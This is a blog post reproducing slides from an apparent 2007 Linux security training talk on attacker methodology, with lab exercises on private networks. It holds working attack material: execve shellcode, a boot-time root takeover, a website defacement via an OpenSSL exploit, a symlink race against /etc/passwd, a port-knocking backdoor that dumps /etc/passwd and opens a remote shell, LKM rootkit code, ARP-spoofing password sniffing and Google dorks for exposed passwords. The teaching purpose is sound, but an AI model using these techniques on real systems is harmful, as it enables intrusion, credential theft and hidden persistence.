Tuesday, April 22, 2008

Hacking Techniques

Hacking Techniques
Attackers
Hackers
Spies
Terrorists
Insider
Prof. Crimminaly
Vandals
Objectives
Challange, Status
Political Gain
Financial Gain
Damage
01./02.02.2007 linuxdays.lu 2007 4
Hacking Techniques
Script Kiddies
Hackers
Geek
Stupid Users
Automated Scripts / Viruses / Botnet / Spam
01./02.02.2007 linuxdays.lu 2007 5
Hacking Techniques
- High profile targets:
-- Banks
-- Military
-- Universities
-- Telecom / internet Provide
--Private PC’s / Enduser
-- Botnet
-- Spam
-- Homebanking Data
01./02.02.2007 linuxdays.lu 2007 6
Hacking Techniques
Most often Security problems:
(Source: CSI/FBI Computer Crime and Security Survey)
Virus
Insider
theft Laptop
Deial of Service
Unauthorised
WLAN
Hacking
01./02.02.2007 linuxdays.lu 2007 7
Hacking Techniques
➤Network based System Hacking
➤Web Server Hacking
➤Physically enter the Target Building
➤WLAN (Wireless LAN) Hacking
➤War Dialling
➤Sniffing
➤Social Engineering
➤Viruses
01./02.02.2007 linuxdays.lu 2007 8
Exercise:
-- physical access = root rights --
1. Interupt the bootloader by pressing >> e <<
2. Select the kernel line and press >> e <<
3. add >> init=/bin/bash <<>
4. kernel /vmlinuz-2.6.8 root=/dev/hda4 ro init=/bin/bash
5. Press >> Enter <<
6. Press >> b <<>
7. mount –o remount,rw /dev/hda4
8. passwd hamm ( password: test123)
9. passwd (password: test123)
10.sync
11.mount –o remount,ro /dev/hda4
12.shutdown –rn now
13.Login as user hamm & launch vmware; start all VM from top down
01./02.02.2007 linuxdays.lu 2007 9
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 10
Footprinting
-- Information Gathering --
➤ visit targets’ websites
➤ review HTML Code, JavaScript and Comments & robots.txt
➤ search for passwords, hidden directories, contact names
➤ Dumpster Diving
Quotation Bill Gates in: Susan Lammers; Programmers at Work
Tempus Books; Reissue Edition, 1989
„No, the best way to prepare is to write programs, and to study
great programs that other people have written. In my case, I went
to the garbage cans at the Computer Science Centre and I fished
out listings of their operating system.“
01./02.02.2007 linuxdays.lu 2007 11
Footprinting
-- Information Gathering --
➤ whois request at the Network Information Centre
-- receive information about IP address ranges
-- Names and EMail addresses of responsibles
whois -h whois.dns.lu linuxdays.lu
domainname: linuxdays.lu
nserver: arthur.tudor.lu
nserver: dorado.tudor.lu
org-name: Centre de Recherche Public Henri Tudor
adm-email: pierre.plumer@crpht.lu
tec-name: Xavier Detro
tec-email: xavier.detro@tudor.lu
Important whois domains:
- RIPE (Europe & N-Africa) - APNIC (Asia Pacific)
- ARIN (N-America & S-Africa) - LACNIC (Latin America)
01./02.02.2007 linuxdays.lu 2007 12
Footprinting
-- Exercise Information Gathering --
➤ DNS Lookup
-- use nslookup tools to receive informations about DNS-
& EMAIL Server, looking for names like Oracle, TestLinux, ....
-- try a zone transfer
➤ Footprinting by DNS: nslookup(1); host(1); dig(1);
# nslookup
> server 192.168.22.22
> www.mumm.lu
> set type=mx
> mumm.lu
> set type=any
> mumm.lu
> ls –d mumm.lu # try zone transfer
> exit
# dig @192.168.22.22 mumm.lu axfr # Zonetransfer
01./02.02.2007 linuxdays.lu 2007 13
Footprinting
-- Information Gathering --
➤whois tools:
-- Sam Spade www.samspade.org
-- Smart Whois www.tamos.com
-- Netscan www.netscantools.com
-- GTWhois www.geektools.com
-- http://www.all-nettools.com/toolbox
➤DNS must reads:
-- RFC 1912 Common DNS Errors
-- RFC 2182 Secondary DNS Servers
-- RFC 2219 Use of DNS Aliases
01./02.02.2007 linuxdays.lu 2007 14
Footprinting
-- Information Gathering --
➤ footprinting @ google
➤ news group articles of employees @
➤ search business partners link:
➤ site: intitle:index.of
➤ site: error | warning
➤ site: login | logon
➤ site: username | userid
➤ site: password
➤ site: admin | administrator
➤ site: inurl:backup | inurl:bak
➤ site: intranet
01./02.02.2007 linuxdays.lu 2007 15
Google Hacking
-- Introduction --
The Beginnings:
www.theregister.co.uk/2001/11/28/the_google_attack_engine/
Link points to a Switch of a .gov Network
Google not 'hackers' best friend‘ -- ww.vnunet.com/News/1127162
Index.of +banques +filetype:xls
Johnny (I hack stuff) Long
‘Google Hacking for Penetration Testers’
Google Hacking Database http://johnny.ihackstuff.com
12.03.2006 Chicago Tribune
http://www.heise.de/newsticker/meldung/70752
2600 CIA Agents discovered via Search Engine
01./02.02.2007 linuxdays.lu 2007 16
Google Hacking
-- Introduction --
What to know:
Advanced Operands:
site:
inurl:
filetype:
intitle:
intext:
…… Google as an ‘
Anonymous Proxy’
Google Cache
&strip=1
01./02.02.2007 linuxdays.lu 2007 17
Google Hacking
-- Introduction --
What to know:
The Power of combining Advanced Operands:
site:heise.de –site:www.heise.de
-- shows all websites NOT from the official Webserver
-- maps nre hostnames without contacting target network
-- wap.heise.de, chat.heise.de, www.tb.heise.de, …
Offline Analysis of the search result:
-- www.sensepost.com/research_misc.html
-- SOAP Google API
01./02.02.2007 linuxdays.lu 2007 18
Google Hacking
-- Introduction --
What to find:
The Google Hacking Database (johnny.ihackstuff.com):
-- Directory Listings à Hidden/Private Files
intitle:index.of ‘parent directory’
intitle:index.of.admin
intitle:index.of inurl:admin
intitle:index.of ws_ftp.log
-- Error Messages of Scripts
‘Fatal error: call to undefined function’
–reply –the –next
‘Warning: Failed opening’ include_path
-- Search for vulnerable Scripts
inurl:guestbook/guestbooklist.asp
‘Post Date’ ‘From Country’
-- Search for Backups
filetype:bak inurl:php.bak
filetype:bak inurl:php.bak
-- Search for:
--- Printers; --- Webcams; --- Intranet Sites;
--- Network Tools Ntop, MRTG; --- Databases
01./02.02.2007 linuxdays.lu 2007 19
Google Hacking
-- Exercise --
Livecycle of a Google Hack:
1. Security Problem deicovered on online product;
2. Analyse online product
3. Find typical string
4. Create a google request
5. Find vulnerable websites
Examples:
-- inurl:php.bak mysql_connect mysql_select_db
-- ext:pwd inurl:(service | authors | administrators | users)
"# -FrontPage-“
-- "index of/" "ws_ftp.ini" "parent directory“
-- !Host=*.* intext:enc_UserPassword=* ext:pcf
-- "admin account info" filetype:log
-- enable password | secret "current configuration“
-intext:the
01./02.02.2007 linuxdays.lu 2007 20
Preparation
anonymity doesn’t exist
➤ break systems in different countries / time zones
➤ install network multipurpose tools like netcat or backdoors
➤ hop from host to host to get anonymity
01./02.02.2007 linuxdays.lu 2007 21
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 22
Scanning
-- Goals --
➤ mapping of the target network
➤ use system tools like traceroute & ping
➤ Visual Tools: NeoTrace (Visual Trace) & Visual Route
➤ finding the range of IP addresses
➤ discerning the subnet mask
➤ identify network devices like firewalls & routers
➤ identify servers
➤ mapping of the reachable services
➤ detecting `live` hosts on target network
➤ discovering services / listening ports / portscan; nmap;
➤ identifying operating system & services
➤ identify application behind services & patch level
01./02.02.2007 linuxdays.lu 2007 23
Scanning
-- Network Mapping --
Nmap: find living hosts
$ su –
# ns_mumm
# cat /etc/resolve.conf
# nmap –sL www.mumm.lu/27 # List Scan
(only do nslookup for the IP rage)
# nmap –-packet_trace –sP www.mumm.lu/27 # ICMP/TCP
(send ICMP Echo Request and ACK to Port 80
if RST is received à host is alive / unfiltered )
# nmap –n –P0 –sU –g 53 –p 53 –T polite www.mumm.lu/27
( UDP Scans are alomost NOT usefully; -g 53 = sourceport
-P0 = don’t PingScan first; -T polite = scan speed)
-sF, -sX, -sN, –sA, # not usable
FIN-, XMAS-, Null-, ACK- Scan # today
01./02.02.2007 linuxdays.lu 2007 24
Scanning
-- Port Scanning --
Nmap: port scan (connect scan)
# nmap –n –sT –P0 –p 80 192.168.22.21,22,24
# nmap –n –sT –P0 –p 110 192.168.22.21,22,24
SYN
SYN/ACK
ACK
SYN
RST/ACK
RST/ACK
Port open
Port closed
01./02.02.2007 linuxdays.lu 2007 25
Scanning
-- Port Scanning --
Nmap: port scan (stealth scan)
# nmap –n –sS –P0 –p 80 192.168.22.21,22,24
# nmap –n –sS –P0 –p 110 192.168.22.21,22,24
SYN
SYN/ACK
RST
SYN
RST/ACK
Port open
Port closed
01./02.02.2007 linuxdays.lu 2007 26
Scanning
-- Port Scanning --
Nmap: port scan
# nmap –n –sT –P0 –p 20-25,80,443 192.168.22.21,22,24
# nmap –n –sS –P0 –p 20-25,80,443 192.168.22.21,22,24
Techniques to stay anonymous:
silent scan:
# nmap –n –sT –P0 –T sneaky –p 20-25,80 192.168.22.22
fragmentation scan
# nmap –n –P0 –f –p 20-25,80 192.168.22.22
decoy scan
# nmap –n -P0 –D 1.1.1.1,2.2.2.2,ME,3.3.3.3 –p 80
01./02.02.2007 linuxdays.lu 2007 27
Scanning
-- Exercise --
Scan the MUMM.LU network:
01./02.02.2007 linuxdays.lu 2007 28
Advanced Scanning
-- IP-ID Idle Scan --
Exercise: Who the hell is scanning you?
target perform:
# tcpdump –n –i eth0 host 192.168.4.
attacker perform: (idle_scan)
01./02.02.2007 linuxdays.lu 2007 29
Advanced Scanning
-- IP-ID Idle Scan --
- based on IP-ID prediction
- example with hping2 –SA –p 80 –c 5
- all packets have Fragment-ID Number
- every new packet increases the IP ID Number
- by most systems IP ID + 1
- this is exploitable
- by monitoring the IP ID value of a host
- you know how many packets he sends
- this could be abused for zombie port scanning
01./02.02.2007 linuxdays.lu 2007 30
Advanced Scanning
-- IP-ID Idle Scan --
Step 1: A) send SYN/ACK to Zombie
B) investigate the answer IPID
C) repeate A) and B) multiple times, verify quality of Zombie
IP-ID Probe -> SYN/ACK
Response -> RST; IPID=3
IP-ID Probe -> SYN/ACK Zombie
Response -> RST; IPID=4
IP-ID Probe -> SYN/ACK
Response -> RST; IPID=5
IP-ID Probe -> SYN/ACK
Response -> RST; IPID=2
01./02.02.2007 linuxdays.lu 2007 31
Advanced Scanning
-- IP-ID Idle Scan --
Step 2: A) Send SYN to target BUT spoof the Source IP Adress,
claim to be the Zombie
B) open port: Target send SYN/ACK to Zombie
C) open port: Zombie send RST and increase IPID to Target
SYN;
Port=80;
SRC IP =
SYN/ACK
Zombie
Target
RST; IPID=6
01./02.02.2007 linuxdays.lu 2007 32
Advanced Scanning
-- IP-ID Idle Scan --
Step 2: A) Send SYN to target BUT spoof the Source IP Adress,
claim to be the Zombie
B) close port: Target simply send a RST to the Zombie
SYN;
Port=80;
SRC IP =
RST
Zombie
Target
01./02.02.2007 linuxdays.lu 2007 33
Advanced Scanning
-- IP-ID Idle Scan --
Step 3: A) send SYN/ACK to Zombie
B) investigate the answer IPID
If IPID = 6 à port was close
If IPID = 7 à port was open
IP-ID Probe -> SYN/ACK
Response -> RST; IPID=7
Zombie
01./02.02.2007 linuxdays.lu 2007 34
Advanced Scanning
-- IP-ID Idle Scan --
IP ID Idle Scan with nmap
# nmap –n –P0 –p20-25,80,443 –sI
# nmap –n –P0 –p20-25,80,443 –sI 10.10.10.10 10.10.11.11
01./02.02.2007 linuxdays.lu 2007 35
Scanning
-- Identifying Services --
Banner Grabbing & Version Mapping:
- What services are bound to the port:
-- identifying service / protocoll;
-- identifying Server-Software;
-- identifying Version Number;
-- identifying additional Modules etc.
automatic approach
# nmap –n –p 20-25,80,443 –sV 192.168.22.22,25
# nmap –n –p 20-25,80,443 –oM scan1 192.168.22.22,25
# amap –B –i scan1
# amap –i scan1
01./02.02.2007 linuxdays.lu 2007 36
Scanning
-- Identifying Services --
Banner Grabbing & Version Mapping:
manual approach with Netcat
# nc 192.168.22.22 22
# nc 192.168.22.22 80
HEAD / HTTP/1.0
# nc 192.168.22.21 21
# nc 192.168.22.21 80
HEAD / HTTP/1.0
OS Detection
# nmap –O 192.168.22.22,25
# xprobe2 192.168.22.22
# xprobe2 –p tcp:443:open 192.168.22.22
01./02.02.2007 linuxdays.lu 2007 37
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 38
Gaining Access
-- Where are we now --
At this point we know (without doing something illegal at all):
-- Targets business (products, partners, emplyees)
-- overview of the network topology
-- overview of live servers and open ports
-- services in use, server-software, version numbers
How to proceed:
-- is there a known vulnerability
-- do we know a vulnerability
-- known configuration problems
-- default passwords
prepare attack
-- research on internet for known security holes
-- default passwords; common misconfigurations
-- setup a test environment to practice the attack
-- ideal: fire one single attack
01./02.02.2007 linuxdays.lu 2007 39
Gaining Access
-- prepare attack --
01./02.02.2007 linuxdays.lu 2007 40
Gaining Access
-- prepare attack --
01./02.02.2007 linuxdays.lu 2007 41
Gaining Access
-- prepare attack --
01./02.02.2007 linuxdays.lu 2007 42
Gaining Access
-- prepare attack --
Gaining Access
-- Buffer Overflow --
➤ Stack Based Buffer Overflows
➤ Off-by-One Overflows
➤ Frame Pointer Overwrites
➤ BSS Overflows
➤ Heap Overflows
01./02.02.2007 linuxdays.lu 2007 44
Gaining Access
-- Stack Based Buffer Overflow --
➤ C/C++ problem
➤ programming error
➤ Copy to much variable user input into fixed sized buffer
#include
int main()
{
char name[31];
printf("Please type your name: ");
gets(name);
printf("Hello, %s", name);
return 0;
}
Buffer overflow occur if you enter
`1234567890123456789012345678901234567890`
01./02.02.2007 linuxdays.lu 2007 45
Gaining Access
-- Stack Based Buffer Overflow --
Exploitation:
-- Missing bounds checking
-- Mutiple „unsafe“ functions in libc
-- Executing code in the data/stack segment
-- Creating the to be feed to the application
Memory layout of a process:
Code
Data
Stack high address
low address
no ‘execution’ attribute set
‘read-only’ attribute
LIFO – top of the stack
BSS
Heap
01./02.02.2007 linuxdays.lu 2007 46
Gaining Access
-- Stack Based Buffer Overflow --
-- Stack holding all the information for the function
-- Stack is created at the beginning of a function
-- Stack is released at the end of a function
-- LIFO mechanism to pass arguments to
functions and to reference local variables
void
function (void)
{
[ ... ]
}
int
main (void)
{
int a;
function (argv[1])
[ ... ]
}
Stack
Frame 1
Frame 2 EBP
ESP
EIP: Extended Instruction Pointer
EBP: Extended Base Pointer
ESP: Extended Stack Pointer
POP
PUSH
- function parameters
- local variables
- data to recover previous frame
01./02.02.2007 linuxdays.lu 2007 47
Gaining Access
-- Stack Based Buffer Overflow --
void
function (char *args)
{
char buff[512];
strcpy (buff, args);
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
Stack
function ()
Frame 2
main ()
Frame 1
Return Address
1
2
3
SFP
4
local variables
buff[512]
args
EIP: Extended Instruction Pointer
EBP: Extended Base Pointer
ESP: Extended Stack Pointer
SFP
saved registers
local variables
ESP
saved registers
args
EBP
EIP
Return Address EIP
01./02.02.2007 linuxdays.lu 2007 48
Gaining Access
-- Stack Based Buffer Overflow --
void
function (char *args)
{
char buff[512];
strcpy (buff, args);
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
Stack
1
2
3
4
buff[512]
5
Wrong Return
SFP
args
EBP
saved registers
local variables
saved registers
args
function ()
Frame 2
main ()
Frame 1
Return Address
01./02.02.2007 linuxdays.lu 2007 49
Gaining Access
-- Stack Based Buffer Overflow --
void
function (char *args)
{
char buff[512];
strcpy (buff, args);
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
1
2
3
456
Stack
buff[512]
SFP
args
EBP
saved registers
local variables
saved registers
args
function ()
Frame 2
main ()
Frame 1
Wrong Return
Return Address
01./02.02.2007 linuxdays.lu 2007 50
Gaining Access
-- Stack Based Buffer Overflow --
void
function (char *args)
{
char buff[512];
strcpy (buff, args);
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
Stack
0x0A00
1
2
3
456
0x0800
0x0A00
shellcode 0x0C00
shellcode
nop
nop
0x0A00
0x0A00
function () 0x0A00
Frame 2
main ()
Frame 1
01./02.02.2007 linuxdays.lu 2007 51
Gaining Access
-- Shellcode --
char linux_ia32_shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%a1 */
"\xcd\x80" /* int $0x80 */
Old school payload: bindshell, backconnect
01./02.02.2007 linuxdays.lu 2007 52
Gaining Access
-- Exercise: Web Site defacement --
$ cd /home/hamm/ssl/
$ ls –la
$ ./openSSL 0x73 192.168.22.21 443 –c 40
/usr/bin/whoami
echo "hacked by me….. " > /var/www/html/index.html
- Unprivileged user -> local user privileges escalation
01./02.02.2007 linuxdays.lu 2007 53
Gaining Access
-- Exercise: Web Site defacement --
What do we see on the Firewall???
01./02.02.2007 linuxdays.lu 2007 54
Gaining Access
primary target webserver
-- why they are so vulnerable --
➤complex application
➤multiple subsystems:
application server, scripts, sql-server
➤self made applications:
programmers don’t know how to write secure code
➤Shell-Command-Injection:
bypass commands through the shell
Input: "Alice; rm - rf"
➤SQL-Injection
bypass SQL Commands by User input
Input: "User=Alice' -&Pass=Idontknow"
01./02.02.2007 linuxdays.lu 2007 55
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 56
Maintaining Access
-- be silent --
➤after a successful initial attack
➤ hide the tracks from logfiles
➤ expand local rights; find vulnerabilities in network
➤ install rootkits, steal password database, start
network sniffer
➤ try same password on other systems
➤ find problems in topology (ex. dual homed hosts)
➤ try to attack the private network
01./02.02.2007 linuxdays.lu 2007 57
Maintaining Access
Privileges Escalation
-- Race Condition --
what could I try to attack?
- SUID / SGID binaries
find / -perm –4000 –type f –user root –print
find / -perm –2000 –type f –group root –print
- privileged process
- Kernel
- password file
Source of problems?
- configuration error
- local software vulnerabilities
-- buffer overflow
-- race condition
-- format string
01./02.02.2007 linuxdays.lu 2007 58
Maintaining Access
Privileges Escalation
-- example: race_bug --
#include
#include
int
main (int argc, char *argv[])
{
char path[] = "/tmp/race.txt"
FILE *fp;
fp = fopen (path, "a+");
fprintf (fp, "%s\n", argv[1]);
fclose (fp);
unlink (path);
return 0;
}
01./02.02.2007 linuxdays.lu 2007 59
Maintaining Access
Privileges Escalation
-- example: race_bug --
Prepare attack
$ cd /home/hamm/race
$ ls –la
$ ./race_bug test
$ ls –la /tmp
$ cat /etc/passwd
$ su -; cp /etc/passwd /etc/passwd.bak; exit
Attak:
$ ln –s /etc/passwd /tmp/race.txt
$ ls –la /tmp
$ cat command
$ ./command
$ ls –la /tmp
$ cat /etc/passwd
$ su – bimbam
# id
01./02.02.2007 linuxdays.lu 2007 60
Maintaining Access
Privileges Escalation
-- Exercise: privileges escalation --
$ su –
# cd /home/hamm/ssl/
# ls –la
# cp p /tftpboot
# /etc/init.d/atftpd start
# exit
$ ./openSSL 0x73 192.168.22.21 443 –c 40
/usr/bin/whoami
pwd
/usr/bin/tftp 192.168.22.1
mode binary # local root exploit
get p # kernel 2.2.x 2.4.x
quit
ls –l
chmod +x p
ls –l
./p
whoami
01./02.02.2007 linuxdays.lu 2007 61
Maintaining Access
Port Knocking
-- introduction --
Aka Port Knocking Back Door
- Open Port?????
- no promisc mode, no open ports
- raw sockets
- trigger for special packets to get activated
- attacker:
-- send trigger pkg1
-- send trigger pkg2
-- send trigger pkg3
-- send command pkg1
- example: Sadoor
http://cmn.listptojects.darklab.org
Port 80, 443 open; statefull
01./02.02.2007 linuxdays.lu 2007 62
Maintaining Access
Port Knocking
-- Sadoor example --
Sadoor daemon configuration: /etc/sadoor/sadoor.pkts
# key 1
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
icmp {
type = 8;
}
}
}
# key 2
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
tcp {
flags = SYN;
dport = 80;
sport = 3456;
}
}
}
01./02.02.2007 linuxdays.lu 2007 63
Maintaining Access
Port Knocking
-- Sadoor example --
Sadoor daemon configuration: /etc/sadoor/sadoor.pkts
# key 3
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
udp {
dport = 111;
data { bim\x20bam }
}
}
}
# command
cmdpkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
tcp {
sport = 80;
sport = 12345;
}
}
}
01./02.02.2007 linuxdays.lu 2007 64
Maintaining Access
Port Knocking
-- Sadoor example --
Create a config-image database
and download it to /home/hamm/.sash
mksadb
mv sadoor.db /var/www/html/
chmod 644 /var/www/html/sadoor.db
Run the daemon
/usr/sbin/sadoor
Review logging
tail –f /etc/sadoor/sadoor.log
01./02.02.2007 linuxdays.lu 2007 65
Maintaining Access
Port Knocking
-- Sadoor example --
ON CLIENT side:
1. Download http://testwww.mumm.lu/sadoor.db
2. become root
cd
cd .sash
mv /home/hamm/sadoor.db .
sadbcat sadoor.db sash.db # create encrypted db
rm –f sadoor.db # delete plain sequence
3. Sending commands
sash 192.168.22.24 \
–vv –r "cat /etc/passwd > /var/www/html/test.txt"
sash 192.168.22.24 "chmod 644 /var/www/html/test.txt"
4. Establish a connection / remote shell
sash 192.168.22.24 –vv
sh-2.05b# whoami
sh-2.05b# /sbin/ifconfig
sh-2.05b# exit
01./02.02.2007 linuxdays.lu 2007 66
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 67
Clearing Tracks
Rootkits
-- introduction --
Main goals of a rootkit:
- hide activities of an attacker to the legal administrator
-- active processes
-- directories & files
-- network activities
- provide a backdoor to the system
- let the attacker become root whenever he want
- collect sensitive data
-- from network
-- from user input
01./02.02.2007 linuxdays.lu 2007 68
Clearing Tracks
Rootkits
-- introduction --
1th generation: Binary Rootkits
- replace important system tools by modified versions:
-- du(1), locate(1), netstat(1), ps(1), top(1),
-- ifconfig(1), w(1), who(1), …..
- defined parameters will become invisible in the future:
-- IP Addresses
-- directories & files
-- usernames
- easy to discover:
-- by filesystem inegrity checker: -- tripwire, -- aide
- examples: Irk3-6, (Linux), Fbrk (FreeBSD), Solaris Rootkit
01./02.02.2007 linuxdays.lu 2007 69
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM (Loadable Kernel Modules) Rootkits
- expand the functionality of the kernel
- can be loaded dynamically: insmod(3), rmmod(3)
- implemented as device driver
-> high level of flexibility
- implementations:
-- new modules
-- infecting existing modules
- result: trojaned kernel à full control over all userland apps.
01./02.02.2007 linuxdays.lu 2007 70
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM (Loadable Kernel Modules) Rootkits
- syscalls: a gate between userland and kernel
- example for syscalls: trace /bin/ls
execve(…
uname(…
brk(0)
old_mmap(…
access(…
open(…
open(…
……
01./02.02.2007 linuxdays.lu 2007 71
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM (Loadable Kernel Modules) Rootkits
- normal syscall:
parameter into
registers int 80
selection of the
interrupt handler
Interrupt handler:
syscall selection
Exec syscall
example: mkdir
Userland
Kernel
Interrupt Descriptor Table
(IDT)
Syscall Table
01./02.02.2007 linuxdays.lu 2007 72
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM (Loadable Kernel Modules) Rootkits
- manipulated syscall:
parameter into
registers int 80
selection of the
interrupt handler
Interrupt handler:
syscall selection
Exec syscall
example: mkdir
Userland
Kernel
Interrupt Descriptor Table
(IDT)
Syscall Table
Exec syscall
manipluated: mkdir
01./02.02.2007 linuxdays.lu 2007 73
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM Rootkit: Exercise: mkdir_Rootkit
#define MODULE /* the new mkdir syscall */
#define __KERNEL__ int hack_mkdir (const char *path) {
printk ("BimBam!\n");
#include return 0;
#include }
#include
#include int init_module (void) {
#include orig_mkdir=sys_call_table[SYS_mkdir];
sys_call_table[SYS_mkdir]=hack_mkdir;
MODULE_LICENSE("GPL"); return 0;
}
/* import syscall table */
extern void *sys_call_table[]; void cleanup_module (void) {
sys_call_table[SYS_mkdir]=hack_mkdir;
/* dummy for old mkdir syscall */ }
int (*orig_mkdir) (const char *path);
01./02.02.2007 linuxdays.lu 2007 74
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM Rootkit: Exercise: mkdir_Rootkit
cd /root/rootkit/mkdir
gcc –c –I /usr/src/linux/include mkdir.c
insmod mkdir.o
lsmod
mkdir test
ls –la
cat /var/log/messages
rmmod mkdir
lsmod
mkdir test
ls –la
Clearing Tracks
Root kits
-- introduction --
2th generation: LKM Rootkit: Adore
cd /root/rootkit/adore/
insmod adore.o
lsmod
insmod cleaner.o
lsmod
rmmod cleaner
lsmod
ps aux | grep ssh
./ava i
ps aux | grep ssh
netstat –punta | grep 22
mkdir /root/rootkit/bimbam
./ava h /root/rootkit/bimbam
ls –la /root/rootkit
./ava –U dummy
01./02.02.2007 linuxdays.lu 2007 76
Clearing Tracks
Rootkits
-- introduction --
3th generation: (Virtual File System) VFS Layer Rootkit
- sys_call_table is not exported anymore
-- Red Hat 8.0 (Kernel 2.4.18)
-- Kernel 2.5.41 à
- all Syscalls which access the Filesystem make use of
the Virtual File System
- in Unix, most of all is handled like a file
- existing Handler-Routines are replaced by modified one
à files/folder could be hidden
à via /proc hidding of processes
01./02.02.2007 linuxdays.lu 2007 77
Clearing Tracks
Rootkits
-- introduction --
3th generation: (Virtual File System) VFS Layer Rootkit
parameter into
registers int 80
selection of the
interrupt handler
Interrupt handler:
syscall selection
Userland
Kernel
Interrupt Descriptor Table
(IDT)
Syscall Table
ext2/ ext3/ ...
VFS
Syscall
01./02.02.2007 linuxdays.lu 2007 78
Hacking Techniques
Insider Attacks
01./02.02.2007 linuxdays.lu 2007 79
Insider Attacks
-- Password Sniffing true a Switch --
Default Gateway
IP: 10.10.10.1
MAC: 11:11:11:11:11:11
IP: 10.10.10.99
MAC: 99:99:99:99:99:99
Attacked PC
IP: 10.10.10.2
MAC: 22:22:22:22:22:22
ARP Reply IP 10.10.10.1 MAC 99:99:99:99:99:99
No gratuitous ARP, BUT directed ARP:
ETHERNET II
Dst: 22:22:22:22:22:22
SRC: 99:99:99:99:99:99
ARP reply:
Sender IP addr: 10.10.10.1
Sender MAC addr: 99:99:99:99:99:99
01./02.02.2007 linuxdays.lu 2007 80
Insider Attacks
-- Password Sniffing true a Switch --
Telnet Client:
IP: 192.168.3.3
IP: ___.___.___.___
Telnet Server:
IP: 192.168.3.4
IP: ___.___.___.___
Exercise:
1. echo 1 > /proc/sys/net/ipv4/ip_forward
2. arpspoof –i eth0 –t 192.168.4.30 192.168.4.28
3. dsniff -cn
Attacker:
IP: 192.168.3.2
MAC: 00:08:74:B3:BB:F1
IP: ___.___.___.___
MAC: __:__:__:__:__:__
01./02.02.2007 linuxdays.lu 2007 81
Insider Attacks
SSH MitM Attack
-- by DNS Spoofing --
SSH Server:
IP: 192.168.3.3
DNS Server:
IP: 158.64.4.
Default Gateway:
IP: 192.168.3.1
Attacker:
IP: 192.168.3.2
Target: SSH Client:
IP: 192.168.3.xx
DNS Response (server_xyz.lu, 192.168.3.2)
DNS Query (HOST: server_xyz.lu)
01./02.02.2007 linuxdays.lu 2007 82
Insider Attacks
SSH MitM Attack
-- by DNS Spoofing --
01./02.02.2007 linuxdays.lu 2007 83
Insider Attacks
SSH MitM Attack
-- by DNS Spoofing --
SSH Server:
IP: 192.168.3.3
DNS Server:
IP: 158.64.4.
Default Gateway:
IP: 192.168.3.1
Attacker:
IP: 192.168.3.2
Target: SSH Client:
IP: 192.168.3.xx
01./02.02.2007 linuxdays.lu 2007 84
Hacking for Admins
by


$UMIT{Fainted Brain}